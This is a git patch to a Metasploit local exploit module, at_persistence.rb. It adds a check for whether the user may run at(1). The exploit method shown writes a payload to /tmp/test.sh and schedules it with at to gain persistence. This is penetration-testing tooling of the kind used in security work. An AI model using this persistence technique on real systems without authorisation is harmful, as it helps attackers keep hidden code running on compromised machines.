From 972db476ef8ee955e80ba116d94eeefaa5b99fa1 Mon Sep 17 00:00:00 2001
From: Jon Hart <jon_hart@rapid7.com>
Date: Tue, 13 Sep 2016 16:08:49 -0700
Subject: [PATCH] Implement check for at_persistence

---
 modules/exploits/multi/local/at_persistence.rb | 14 +++++++++++---
 1 file changed, 11 insertions(+), 3 deletions(-)

diff --git a/modules/exploits/multi/local/at_persistence.rb b/modules/exploits/multi/local/at_persistence.rb
index 502c3c8083..dd41d43369 100644
--- a/modules/exploits/multi/local/at_persistence.rb
+++ b/modules/exploits/multi/local/at_persistence.rb
@@ -47,14 +47,22 @@ class MetasploitModule < Msf::Exploit::Local
     )
   end
 
-  # TODO: find a better way to determine if the user can use at(1).  cmd_exec doesn't get us stderr or a return code
   def check
-    cmd_exec("ls -l")
+    token = "fail #{Rex::Text.rand_text_alphanumeric(8)}"
+    if cmd_exec("at -l || echo #{token}") =~ /#{token}/
+      Exploit::CheckCode::Safe
+    else
+      Exploit::CheckCode::Vulnerable
+    end
   end
 
   def exploit
+    unless check == Exploit::CheckCode::Vulnerable
+      fail_with(Failure::NoAccess, 'User denied cron via at.deny')
+    end
+
     write_file("/tmp/test.sh", payload.encoded)
-    print_status(cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}"))
+    cmd_exec("at -f /tmp/test.sh #{datastore['TIME']}")
     print_status("Waiting #{datastore['WfsDelay']}sec for execution")
     Rex.sleep(datastore['WfsDelay'].to_i)
   end